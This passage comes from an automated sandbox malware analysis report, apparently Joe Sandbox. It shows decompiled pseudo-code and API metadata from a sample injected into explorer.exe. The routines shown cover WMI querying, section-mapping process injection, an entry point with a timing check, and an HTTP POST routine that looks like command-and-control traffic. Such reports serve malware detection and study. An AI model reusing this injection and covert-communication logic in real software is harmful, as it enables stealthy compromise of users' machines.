                  						if(_t252 == 0) {
                  							E0008861A( &_v36, 0);
                  							_t320 = _v36;
                  						} else {
                  							 *(_t320 + 8) = _t252;
                  							 *_t320 = E000891E3(_v100);
                  							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
                  						}
                  						goto L52;
                  					} else {
                  						goto L6;
                  					}
                  					while(1) {
                  						L6:
                  						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                  						__eflags = _t186;
                  						if(_t186 != 0) {
                  							break;
                  						}
                  						_v16 = 0;
                  						_v48 = 0;
                  						_v12 = 0;
                  						_v24 = 0;
                  						__eflags = _v84;
                  						if(_v84 == 0) {
                  							break;
                  						}
                  						_t187 = _v28;
                  						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                  						__eflags = _t188;
                  						if(_t188 >= 0) {
                  							__imp__#20(_v24, 1,  &_v16);
                  							__imp__#19(_v24, 1,  &_v48);
                  							_t46 = _t320 + 0xc; // 0xc
                  							_t253 = _t46;
                  							_t327 = _t252 << 3;
                  							_t47 = _t327 + 8; // 0x8
                  							_t192 = E00088698(_t327, _t47);
                  							__eflags = _t192;
                  							if(_t192 == 0) {
                  								__imp__#16(_v24);
                  								_t193 = _v28;
                  								 *((intOrPtr*)( *_t193 + 8))(_t193);
                  								L46:
                  								_t252 = _v20;
                  								break;
                  							}
                  							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                  							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
                  							_t200 =  *_t253;
                  							__eflags =  *(_t327 + _t200 + 4);
                  							if( *(_t327 + _t200 + 4) == 0) {
                  								_t136 = _t320 + 0xc; // 0xc
                  								E0008861A(_t136, 0);
                  								E0008861A( &_v36, 0);
                  								__imp__#16(_v24);
                  								_t205 = _v28;
                  								 *((intOrPtr*)( *_t205 + 8))(_t205);
                  								_t320 = _v36;
                  								goto L46;
                  							}
                  							_t207 = _v16;
                  							while(1) {
                  								_v12 = _t207;
                  								__eflags = _t207 - _v48;
                  								if(_t207 > _v48) {
                  									break;
                  								}
                  								_v44 = _v44 & 0x00000000;
                  								_t209 =  &_v12;
                  								__imp__#25(_v24, _t209,  &_v44);
                  								__eflags = _t209;
                  								if(_t209 < 0) {
                  									break;
                  								}
                  								_t212 = E000891E3(_v44);
                  								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                  								_t213 = _v28;
                  								_t281 =  *_t213;
                  								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                  								__eflags = _t214;
                  								if(_t214 < 0) {
                  									L39:
                  									__imp__#6(_v44);
                  									_t207 = _v12 + 1;
                  									__eflags = _t207;
                  									continue;
                  								}
                  								_v92 = E000895E1(_t281, 0x250);
                  								 *_t329 = 0x4cc;
                  								_t217 = E000895E1(_t281);
                  								_t283 = _v80;
                  								_v96 = _t217;
                  								_t218 = _t283 & 0x0000ffff;
                  								__eflags = _t218 - 0xb;
                  								if(__eflags > 0) {
                  									_t219 = _t218 - 0x10;
                  									__eflags = _t219;
                  									if(_t219 == 0) {
                  										L35:
                  										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
                  										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                  										__eflags = _t289;
                  										if(_t289 == 0) {
                  											L38:
                  											E000885D5( &_v92);
                  											E000885D5( &_v96);
                  											__imp__#9( &_v80);
                  											goto L39;
                  										}
                  										_push(_v72);
                  										_push(L"%d");
                  										L37:
                  										_push(0xc);
                  										_push(_t289);
                  										E00089640();
                  										_t329 = _t329 + 0x10;
                  										goto L38;
                  									}
                  									_t230 = _t219 - 1;
                  									__eflags = _t230;
                  									if(_t230 == 0) {
                  										L33:
                  										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
                  										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                  										__eflags = _t289;
                  										if(_t289 == 0) {
                  											goto L38;
                  										}
                  										_push(_v72);
                  										_push(L"%u");
                  										goto L37;
                  									}
                  									_t235 = _t230 - 1;
                  									__eflags = _t235;
                  									if(_t235 == 0) {
                  										goto L33;
                  									}
                  									__eflags = _t235 == 1;
                  									if(_t235 == 1) {
                  										goto L33;
                  									}
                  									L28:
                  									__eflags = _t283 & 0x00002000;
                  									if((_t283 & 0x00002000) == 0) {
                  										_v88 = E000895E1(_t283, 0x219);
                  										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                  										E000885D5( &_v88);
                  										_t329 = _t329 + 0x18;
                  										_t298 =  &_v616;
                  										L31:
                  										_t242 = E000891E3(_t298);
                  										L32:
                  										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                  										goto L38;
                  									}
                  									_t242 = E0008DA20( &_v80);
                  									goto L32;
                  								}
                  								if(__eflags == 0) {
                  									__eflags = _v72 - 0xffff;
                  									_t298 = L"TRUE";
                  									if(_v72 != 0xffff) {
                  										_t298 = L"FALSE";
                  									}
                  									goto L31;
                  								}
                  								_t243 = _t218 - 1;
                  								__eflags = _t243;
                  								if(_t243 == 0) {
                  									goto L38;
                  								}
                  								_t244 = _t243 - 1;
                  								__eflags = _t244;
                  								if(_t244 == 0) {
                  									goto L35;
                  								}
                  								_t245 = _t244 - 1;
                  								__eflags = _t245;
                  								if(_t245 == 0) {
                  									goto L35;
                  								}
                  								__eflags = _t245 != 5;
                  								if(_t245 != 5) {
                  									goto L28;
                  								}
                  								_t298 = _v72;
                  								goto L31;
                  							}
                  							__imp__#16(_v24);
                  							_t210 = _v28;
                  							 *((intOrPtr*)( *_t210 + 8))(_t210);
                  							_t252 = _v20;
                  							L42:
                  							_t262 = _v32;
                  							_t252 = _t252 + 1;
                  							_v20 = _t252;
                  							__eflags = _t262;
                  							if(_t262 != 0) {
                  								continue;
                  							}
                  							L48:
                  							_t324 = _v40;
                  							goto L49;
                  						}
                  						_t247 = _v28;
                  						 *((intOrPtr*)( *_t247 + 8))(_t247);
                  						goto L42;
                  					}
                  					_t262 = _v32;
                  					goto L48;
                  				} else {
                  					E0008861A( &_v36, _t322);
                  					_t320 = _v36;
                  					goto L53;
                  				}
                  			}

                  0x0008dd6d
                  0x0008dd70
                  0x0008dd73
                  0x0008dd76
                  0x0008dd79
                  0x0008ddb5
                  0x0008ddb5
                  0x0008ddb8
                  0x0008de64
                  0x0008de78
                  0x0008de88
                  0x0008de8c
                  0x0008de8e
                  0x0008dea5
                  0x0008dea9
                  0x0008deb2
                  0x0008debd
                  0x00000000
                  0x0008debd
                  0x0008de94
                  0x0008de95
                  0x0008de9a
                  0x0008de9a
                  0x0008de9c
                  0x0008de9d
                  0x0008dea2
                  0x00000000
                  0x0008dea2
                  0x0008ddbe
                  0x0008ddbe
                  0x0008ddc1
                  0x0008de2c
                  0x0008de40
                  0x0008de50
                  0x0008de54
                  0x0008de56
                  0x00000000
                  0x00000000
                  0x0008de5c
                  0x0008de5d
                  0x00000000
                  0x0008de5d
                  0x0008ddc3
                  0x0008ddc3
                  0x0008ddc6
                  0x00000000
                  0x00000000
                  0x0008ddc8
                  0x0008ddcb
                  0x00000000
                  0x00000000
                  0x0008ddcd
                  0x0008ddcd
                  0x0008ddd3
                  0x0008ddef
                  0x0008ddfe
                  0x0008de07
                  0x0008de0c
                  0x0008de0f
                  0x0008de15
                  0x0008de15
                  0x0008de1a
                  0x0008de26
                  0x00000000
                  0x0008de26
                  0x0008ddd8
                  0x00000000
                  0x0008ddd8
                  0x0008dd7b
                  0x0008dda2
                  0x0008dda7
                  0x0008ddac
                  0x0008ddae
                  0x0008ddae
                  0x00000000
                  0x0008ddac
                  0x0008dd7d
                  0x0008dd7d
                  0x0008dd80
                  0x00000000
                  0x00000000
                  0x0008dd86
                  0x0008dd86
                  0x0008dd89
                  0x00000000
                  0x00000000
                  0x0008dd8f
                  0x0008dd8f
                  0x0008dd92
                  0x00000000
                  0x00000000
                  0x0008dd98
                  0x0008dd9b
                  0x00000000
                  0x00000000
                  0x0008dd9d
                  0x00000000
                  0x0008dd9d
                  0x0008dedf
                  0x0008dee5
                  0x0008deeb
                  0x0008deee
                  0x0008def1
                  0x0008def1
                  0x0008def4
                  0x0008def5
                  0x0008def8
                  0x0008defa
                  0x00000000
                  0x00000000
                  0x0008df4a
                  0x0008df4a
                  0x00000000
                  0x0008df4a
                  0x0008dc81
                  0x0008dc87
                  0x00000000
                  0x0008dc87
                  0x0008df47
                  0x00000000
                  0x0008dbca
                  0x0008dbcf
                  0x0008dbd4
                  0x00000000
                  0x0008dbd8

                  APIs
                    • Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                    • Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                    • Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                    • Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
                    • Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
                  • SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
                  • SysFreeString.OLEAUT32(?), ref: 0008DF82
                  • SysFreeString.OLEAUT32(?), ref: 0008DF8B
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                  • String ID: FALSE$TRUE
                  • API String ID: 1290676130-1412513891
                  • Opcode ID: 44f48047a587ed4ae3496f6ff5f9f3f4d9a45de3618279219bf8f1527d89ff28
                  • Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
                  • Opcode Fuzzy Hash: 44f48047a587ed4ae3496f6ff5f9f3f4d9a45de3618279219bf8f1527d89ff28
                  • Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 59%
                  			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
                  				signed int _v8;
                  				char _v12;
                  				char _v16;
                  				intOrPtr _v20;
                  				char _v24;
                  				char _v28;
                  				char _v32;
                  				intOrPtr _v36;
                  				struct HINSTANCE__* _v40;
                  				char _v44;
                  				char _v56;
                  				char _v72;
                  				struct _WNDCLASSEXA _v120;
                  				intOrPtr _t69;
                  				intOrPtr _t71;
                  				intOrPtr _t75;
                  				intOrPtr _t80;
                  				intOrPtr _t92;
                  				intOrPtr _t95;
                  				intOrPtr _t96;
                  				struct HWND__* _t106;
                  				intOrPtr* _t113;
                  				struct HINSTANCE__* _t116;
                  				intOrPtr _t120;
                  				intOrPtr _t126;
                  				intOrPtr _t131;
                  				intOrPtr _t134;
                  				intOrPtr _t136;
                  				intOrPtr _t139;
                  				char _t140;
                  				intOrPtr _t141;
                  
                  				_t69 =  *0x9e688; // 0xb0000
                  				_t126 = __ecx;
                  				_t134 = __edx;
                  				_t116 = 0;
                  				_v36 = __edx;
                  				_v16 = 0;
                  				_v44 = 0;
                  				_v40 = 0;
                  				_v12 = 0;
                  				_v8 = 0;
                  				_v24 = 0;
                  				_v20 = __ecx;
                  				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                  					E0008E23E(0x1f4);
                  					_t116 = 0;
                  				}
                  				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                  				_v28 = _t116;
                  				if( *_t113 != 0x4550) {
                  					L12:
                  					if(_v8 != 0) {
                  						_t75 =  *0x9e780; // 0x0
                  						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                  						_v8 = _v8 & 0x00000000;
                  					}
                  					L14:
                  					if(_v12 != 0) {
                  						_t136 =  *0x9e780; // 0x0
                  						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
                  					}
                  					if(_v16 != 0) {
                  						_t71 =  *0x9e780; // 0x0
                  						 *((intOrPtr*)(_t71 + 0x20))(_v16);
                  					}
                  					return _v8;
                  				}
                  				_push(_t116);
                  				_push(0x8000000);
                  				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                  				_push(0x40);
                  				_push( &_v44);
                  				_push(_t116);
                  				_push(0xe);
                  				_push( &_v16);
                  				_t80 =  *0x9e780; // 0x0
                  				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
                  					goto L12;
                  				}
                  				_v120.style = 0xb;
                  				_v120.cbSize = 0x30;
                  				_v120.lpszClassName =  &_v56;
                  				asm("movsd");
                  				_v120.lpfnWndProc = DefWindowProcA;
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsb");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsw");
                  				asm("movsb");
                  				_v120.cbWndExtra = 0;
                  				_v120.lpszMenuName = 0;
                  				_v120.cbClsExtra = 0;
                  				_v120.hInstance = 0;
                  				if(RegisterClassExA( &_v120) != 0) {
                  					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
                  					if(_t106 != 0) {
                  						DestroyWindow(_t106);
                  						UnregisterClassA( &_v56, 0);
                  					}
                  				}
                  				_t139 =  *0x9e780; // 0x0
                  				_push(0x40);
                  				_push(0);
                  				_push(2);
                  				_push( &_v24);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push( &_v12);
                  				_push(GetCurrentProcess());
                  				_push(_v16);
                  				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
                  					_t126 = _v20;
                  					goto L12;
                  				} else {
                  					_push(0x40);
                  					_push(0);
                  					_push(2);
                  					_push( &_v24);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_t126 = _v20;
                  					_push( &_v8);
                  					_t92 =  *0x9e780; // 0x0
                  					_push(_t126);
                  					_push(_v16);
                  					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
                  						goto L12;
                  					}
                  					_t140 = E00088669( *0x9e688, 0x1ac4);
                  					_v32 = _t140;
                  					if(_t140 == 0) {
                  						goto L12;
                  					}
                  					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                  					_t95 =  *0x9e684; // 0xe7f8f0
                  					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
                  					_t120 =  *0x9e684; // 0xe7f8f0
                  					_t131 = _t96;
                  					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
                  					E0008861A( &_v32, 0x1ac4);
                  					_t141 =  *0x9e688; // 0xb0000
                  					 *0x9e688 = _t131;
                  					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                  					E0008C63F(_v12, _v8, _v36);
                  					 *0x9e688 = _t141;
                  					goto L14;
                  				}
                  			}

                  APIs
                  • RegisterClassExA.USER32 ref: 0008C785
                  • CreateWindowExA.USER32 ref: 0008C7B0
                  • DestroyWindow.USER32 ref: 0008C7BB
                  • UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
                  • GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                  • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                  • API String ID: 3082384575-2319545179
                  • Opcode ID: da2a3bd41226a2e89f7497ec74bd49478804e8ac160ba7bf55d9b58a49516d1a
                  • Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
                  • Opcode Fuzzy Hash: da2a3bd41226a2e89f7497ec74bd49478804e8ac160ba7bf55d9b58a49516d1a
                  • Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 78%
                  			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                  				char _v8;
                  				char _v16;
                  				short _v144;
                  				short _v664;
                  				void* _t19;
                  				struct HINSTANCE__* _t22;
                  				long _t23;
                  				long _t24;
                  				char* _t27;
                  				WCHAR* _t32;
                  				long _t33;
                  				intOrPtr _t37;
                  				intOrPtr _t38;
                  				void* _t49;
                  				int _t53;
                  				void* _t54;
                  				intOrPtr* _t55;
                  				void* _t57;
                  
                  				_t49 = __edx;
                  				OutputDebugStringA("Hello qqq");
                  				if(_a8 != 1) {
                  					if(_a8 != 0) {
                  						L12:
                  						return 1;
                  					}
                  					SetLastError(0xaa);
                  					L10:
                  					return 0;
                  				}
                  				E000885EF();
                  				_t19 = E0008980C( &_v16);
                  				_t57 = _t49;
                  				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                  					goto L12;
                  				} else {
                  					E00088F78();
                  					GetModuleHandleA(0);
                  					_t22 = _a4;
                  					 *0x9e69c = _t22;
                  					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                  					_t24 = GetLastError();
                  					if(_t23 != 0 && _t24 != 0x7a) {
                  						memset( &_v144, 0, 0x80);
                  						_t55 = _t54 + 0xc;
                  						_t53 = 0;
                  						do {
                  							_t27 = E000895C7(_t53);
                  							_a8 = _t27;
                  							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                  							E000885C2( &_a8);
                  							_t53 = _t53 + 1;
                  						} while (_t53 < 0x2710);
                  						E00092A5B( *0x9e69c);
                  						 *_t55 = 0x7c3;
                  						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
                  						 *_t55 = 0xb4e;
                  						_t32 = E000895E1(0x9ba28);
                  						_a8 = _t32;
                  						_t33 = GetFileAttributesW(_t32);
                  						_push( &_a8);
                  						if(_t33 == 0xffffffff) {
                  							E000885D5();
                  							_v8 = 0;
                  							_t37 =  *0x9e684; // 0xe7f8f0
                  							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
                  							 *0x9e6a8 = _t38;
                  							if(_t38 == 0) {
                  								goto L10;
                  							}
                  							goto L12;
                  						}
                  						E000885D5();
                  					}
                  					goto L10;
                  				}
                  			}

                  APIs
                  • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
                  • SetLastError.KERNEL32(000000AA), ref: 000860D7
                    • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                    • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                    • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                  • GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
                  • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
                  • GetLastError.KERNEL32 ref: 00085FEF
                  • memset.MSVCRT ref: 00086013
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
                  • GetFileAttributesW.KERNEL32(00000000), ref: 00086083
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                  • String ID: Hello qqq
                  • API String ID: 1203100507-3610097158
                  • Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                  • Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
                  • Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                  • Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                  				char _v8;
                  				char _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				char _v24;
                  				intOrPtr _v28;
                  				char _v32;
                  				intOrPtr _v36;
                  				signed int _v40;
                  				signed int _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				char _v64;
                  				int _v76;
                  				void* _v80;
                  				intOrPtr _v100;
                  				int _v104;
                  				void* _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				char* _v120;
                  				void _v124;
                  				char _v140;
                  				void _v396;
                  				void _v652;
                  				intOrPtr _t105;
                  				intOrPtr _t113;
                  				intOrPtr* _t115;
                  				intOrPtr _t118;
                  				intOrPtr _t121;
                  				intOrPtr _t124;
                  				intOrPtr _t127;
                  				intOrPtr _t131;
                  				char _t133;
                  				intOrPtr _t136;
                  				char _t138;
                  				char _t139;
                  				intOrPtr _t141;
                  				intOrPtr _t147;
                  				intOrPtr _t154;
                  				intOrPtr _t158;
                  				intOrPtr _t162;
                  				intOrPtr _t164;
                  				intOrPtr _t166;
                  				intOrPtr _t172;
                  				intOrPtr _t176;
                  				void* _t183;
                  				void* _t185;
                  				intOrPtr _t186;
                  				char _t195;
                  				intOrPtr _t203;
                  				intOrPtr _t204;
                  				signed int _t209;
                  				void _t212;
                  				intOrPtr _t213;
                  				void* _t214;
                  				intOrPtr _t216;
                  				char _t217;
                  				intOrPtr _t218;
                  				signed int _t219;
                  				signed int _t220;
                  				void* _t221;
                  
                  				_v40 = _v40 & 0x00000000;
                  				_v24 = 4;
                  				_v36 = 1;
                  				_t214 = __edx;
                  				memset( &_v396, 0, 0x100);
                  				memset( &_v652, 0, 0x100);
                  				_v64 = E000895C7(0x85b);
                  				_v60 = E000895C7(0xdc9);
                  				_v56 = E000895C7(0x65d);
                  				_v52 = E000895C7(0xdd3);
                  				_t105 = E000895C7(0xb74);
                  				_v44 = _v44 & 0;
                  				_t212 = 0x3c;
                  				_v48 = _t105;
                  				memset( &_v124, 0, 0x100);
                  				_v116 = 0x10;
                  				_v120 =  &_v140;
                  				_v124 = _t212;
                  				_v108 =  &_v396;
                  				_v104 = 0x100;
                  				_v80 =  &_v652;
                  				_push( &_v124);
                  				_push(0);
                  				_v76 = 0x100;
                  				_push(E0008C379(_t214));
                  				_t113 =  *0x9e6a4; // 0x2790788
                  				_push(_t214);
                  				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                  					_t209 = 0;
                  					_v20 = 0;
                  					do {
                  						_t115 =  *0x9e6a4; // 0x2790788
                  						_v12 = 0x8404f700;
                  						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                  						if(_t213 != 0) {
                  							_t195 = 3;
                  							_t185 = 4;
                  							_v8 = _t195;
                  							_t118 =  *0x9e6a4; // 0x2790788
                  							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                  							_v8 = 0x3a98;
                  							_t121 =  *0x9e6a4; // 0x2790788
                  							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                  							_v8 = 0x493e0;
                  							_t124 =  *0x9e6a4; // 0x2790788
                  							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                  							_v8 = 0x493e0;
                  							_t127 =  *0x9e6a4; // 0x2790788
                  							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                  							_t131 =  *0x9e6a4; // 0x2790788
                  							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                  							if(_a24 != 0) {
                  								E0008980C(_a24);
                  							}
                  							if(_t186 != 0) {
                  								_t133 = 0x8484f700;
                  								if(_v112 != 4) {
                  									_t133 = _v12;
                  								}
                  								_t136 =  *0x9e6a4; // 0x2790788
                  								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                  								_v8 = _t216;
                  								if(_a24 != 0) {
                  									E0008980C(_a24);
                  								}
                  								if(_t216 != 0) {
                  									_t138 = 4;
                  									if(_v112 != _t138) {
                  										L19:
                  										_t139 = E000895C7(0x777);
                  										_t217 = _t139;
                  										_v12 = _t217;
                  										_t141 =  *0x9e6a4; // 0x2790788
                  										_t218 = _v8;
                  										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
                  										E000885C2( &_v12);
                  										if(_a24 != 0) {
                  											E0008980C(_a24);
                  										}
                  										if(_v28 != 0) {
                  											L28:
                  											_v24 = 8;
                  											_push(0);
                  											_v32 = 0;
                  											_v28 = 0;
                  											_push( &_v24);
                  											_push( &_v32);
                  											_t147 =  *0x9e6a4; // 0x2790788
                  											_push(0x13);
                  											_push(_t218);
                  											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                  												_t219 = E00089749( &_v32);
                  												if(_t219 == 0xc8) {
                  													 *_a20 = _v8;
                  													 *_a12 = _t213;
                  													 *_a16 = _t186;
                  													return 0;
                  												}
                  												_t220 =  ~_t219;
                  												L32:
                  												_t154 =  *0x9e6a4; // 0x2790788
                  												 *((intOrPtr*)(_t154 + 8))(_v8);
                  												L33:
                  												if(_t186 != 0) {
                  													_t158 =  *0x9e6a4; // 0x2790788
                  													 *((intOrPtr*)(_t158 + 8))(_t186);
                  												}
                  												if(_t213 != 0) {
                  													_t203 =  *0x9e6a4; // 0x2790788
                  													 *((intOrPtr*)(_t203 + 8))(_t213);
                  												}
                  												return _t220;
                  											}
                  											GetLastError();
                  											_t220 = 0xfffffff8;
                  											goto L32;
                  										} else {
                  											GetLastError();
                  											_t162 =  *0x9e6a4; // 0x2790788
                  											 *((intOrPtr*)(_t162 + 8))(_t218);
                  											_t218 = 0;
                  											goto L23;
                  										}
                  									}
                  									_v12 = _t138;
                  									_push( &_v12);
                  									_push( &_v16);
                  									_t172 =  *0x9e6a4; // 0x2790788
                  									_push(0x1f);
                  									_push(_t216);
                  									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                  										L18:
                  										GetLastError();
                  										goto L19;
                  									}
                  									_v16 = _v16 | 0x00003380;
                  									_push(4);
                  									_push( &_v16);
                  									_t176 =  *0x9e6a4; // 0x2790788
                  									_push(0x1f);
                  									_push(_t216);
                  									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                  										goto L19;
                  									}
                  									goto L18;
                  								} else {
                  									GetLastError();
                  									L23:
                  									_t164 =  *0x9e6a4; // 0x2790788
                  									 *((intOrPtr*)(_t164 + 8))(_t186);
                  									_t186 = 0;
                  									goto L24;
                  								}
                  							} else {
                  								GetLastError();
                  								L24:
                  								_t166 =  *0x9e6a4; // 0x2790788
                  								 *((intOrPtr*)(_t166 + 8))(_t213);
                  								_t213 = 0;
                  								goto L25;
                  							}
                  						}
                  						GetLastError();
                  						L25:
                  						_t204 = _t218;
                  						_t209 = _v20 + 1;
                  						_v20 = _t209;
                  					} while (_t209 < 2);
                  					_v8 = _t218;
                  					if(_t204 != 0) {
                  						goto L28;
                  					}
                  					_t220 = 0xfffffffe;
                  					goto L33;
                  				}
                  				_t183 = 0xfffffffc;
                  				return _t183;
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memset$ErrorLast
                  • String ID: POST
                  • API String ID: 2570506013-1814004025
                  • Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                  • Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
